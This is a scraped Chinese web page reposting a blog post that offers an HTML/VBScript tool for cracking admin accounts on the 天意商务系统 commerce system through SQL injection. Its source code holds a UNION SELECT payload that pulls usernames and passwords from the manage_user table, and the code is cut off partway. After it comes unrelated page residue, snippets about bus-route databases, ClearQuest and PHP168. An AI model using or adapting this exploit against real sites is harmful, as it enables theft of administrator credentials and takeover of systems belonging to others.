天意商务系统后台管理帐号破解html版

天意商务系统后台管理帐号破解html版
/**
慈勤强
http://blog.111cn.net/cqq
*/
自从上次写了个天意商务系统破解程序之后,
收到了不少朋友的来信,
有询问程序原理的,有询问如何防护的。

今天,我抽了一点时间,做了这个Html版,就只有这一个htm文件
相信有点html知识和SQL Injection知识的朋友都能够看懂
原理非常简单,破解用户帐号是用的SQL Injection方法,
因为这套系统好多地方存在sql injection漏洞,
然后自己下载个这套系统,就可以很方便的找出问题了。

以前是Vc++版本,现在是html版本,不过都是一样,
就是通过http协议取得网页的源文件
然后分析源文件,找到用户名和密码
并且显示出来。
下面是源代码,大家只要把这个文件保存到硬盘上,起名叫ty.htm,就可以了。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>天意商务系统后台管理帐号破解html版--慈勤强制作</title>
<SCRIPT Language = "VbScript">
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Sub OpenUrl(strUrl)

strTmp = ""
strUser = "!"
strAAA =""
strCqq=""
i=0
on Error Resume Next
While Trim(strUser) <> ""
strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2"
Set xmlhttp = CreateObject("Microsoft.XMLHTTP")

时间: 2024-09-28 12:14:06

天意商务系统后台管理帐号破解html版的相关文章

天意商务系统后台管理帐号破解html版_安全相关

天意商务系统后台管理帐号破解html版 Powered By Steven_Cee Http://blog.csdn.net/cqq   帮助说明,请看      

公交车路线查询系统后台数据库设计——关联地名和站点

在<公交车路线查询系统后台数据库设计--查询算法>一文中,已经实现了查询站点到站点的路线 查询算法,但是,现实中用户不一定使用站点进行查询,而是使用地名.因此,公交车查询系统数据库必 需记录地名与站点的对应关系,在查询时将地名映射为站点.根据实际情况,某一地点附近通常有几个站 点,因此,地名与站点之间是多对多的关系.显然,只需创建一个地名站点关系表stop_spot(Stop,Spot) 用于储存这个关系即可.数据库关系图如下: 注: Route:路线表 Stop:站点表 Spot:地名表 s

clearquest安装时出现错误:系统的产品构建号高于in要安装的版本

问题描述 clearquest安装时出现错误:系统的产品构建号高于in要安装的版本 clearquest第一次安装成功后.没有配置好,想要重新安装,然后就一直出现这个错误提示,求解答!

透视和调整你的企业和商务系统(Ⅰ:Analyzing、Requirement) (ccBoy原创)

和调整你的企业和商务系统(Ⅰ:Analyzing.Requirement) 小气的神 2001-10-09 对于dotNET,这是一项新的技术,一个为适应变化的应用系统体系.你可能不屑一顾还是测试版而已,宁愿观望:你可能已经开始接触它,透过这些新的技术开始思考现在和未来的企业或商务的应用程序结构.它们会是怎样的呢,呈现在你面前的将是一幅怎样的情景?一般你会问自己这样的问题:Why-这项新技术是什么?是用来干什么的,和现有的技术有什么优劣.Who-谁会用这项技术?对我或我的应用有用吗?When-什

【最新正版】江湖家居系统V5.2_装修门户系统后台功能大曝光

中介交易 SEO诊断 淘宝客 云主机 技术大厅 江湖家居门户系统是合肥江湖信息科技有限公司专门针对装修行业开发一套开源行业门户系统.自2013年开发完成推出以后,商业用户数目已达350家.而且这些客户都是来自装修行业的目标人群,他们有的经营自己的装修公司,有的运营自己的装修门户网站,还有很多怀揣创业梦想的站长朋友们--通过江湖家居门户系统,他们可以在没有技术开发团队的前提下,建立自己的装修门户平台,因为大部分都可以通过江湖家居系统后台就能操作,下面就详细介绍一下后台基本功能; 进入后台首页顶部显

行业商务解决方案 PHP168即将发布商务系统

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 商务系统让草根用户逐步转为运营型.盈利型网站创造者,其网站核心将更倾向于企业及企业产品.借助商务系统让网友将进一步利用PHP168 CMS程序,建成与传统经济或企业产品高结合度的互联网系统. 商务系统在现有的主流电子商务网站上进行优化,基本架构成熟.有完善的独立商家平台,能管理企业产品及一切相关行为,同时商家与运营者有良好关联体系.设有批量询

PHP168商务系统 为行业商务解决方案

&http://www.aliyun.com/zixun/aggregation/37954.html">nbsp;   商务系统让草根用户逐步转为运营型.盈利型网站创造者,其网站核心将更倾向于企业及企业产品.借助商务系统让网友将进一步利用PHP168 CMS程序,建成与传统经济或企业产品高结合度的互联网系统. 商务系统在现有的主流电子商务网站上进行优化,基本架构成熟.有完善的独立商家平台,能管理企业产品及一切相关行为,同时商家与站长有良好关联体系.设有批量询价.产品推荐.批量报价

新开发的系统后台是Websphere portal server V6,运行一段时间后wps后台报内存溢出。请各位高手分析一下原因,帮忙解决一下。谢了!!!

问题描述 新开发的系统后台是WebsphereportalserverV6,运行一段时间后wps后台报内存溢出.请各位高手分析一下原因,帮忙解决一下.谢了!!! 解决方案 解决方案二:内存启动时开多大的?应用程序也存在引起OOM的问题,一步步分析定位来解决吧后台的log发出来解决方案三:先用内存分析工具确定是不是自己的应用有问题,排除了这个问题,再从portal入手找问题,看是不是portal自带数据库的问题......解决方案四:从网上找一个内存分析工具看一下那个对象出现了泄漏,这个不通过工具

透视和调整你的企业和商务系统(Ⅲ:SOAP、WebService、Server) (ccBoy原创)

和调整你的企业和商务系统(Ⅲ:SOAP.WebService.Server)小气的神 2001-10-12     好了,终于可以开始使用Microsoft SOAP Toolkit将上面的建立的Bus_Authors转换成一个WebService了,我使用的是Microsoft SOAP Toolkit 2.0 SP2,简单的Version()的我就跳过了,不再废话,MS的随机帮助有这方面的说明.因为我更感兴趣ADODB.Recordset的问题,不过失望的是,使用WSDL Generator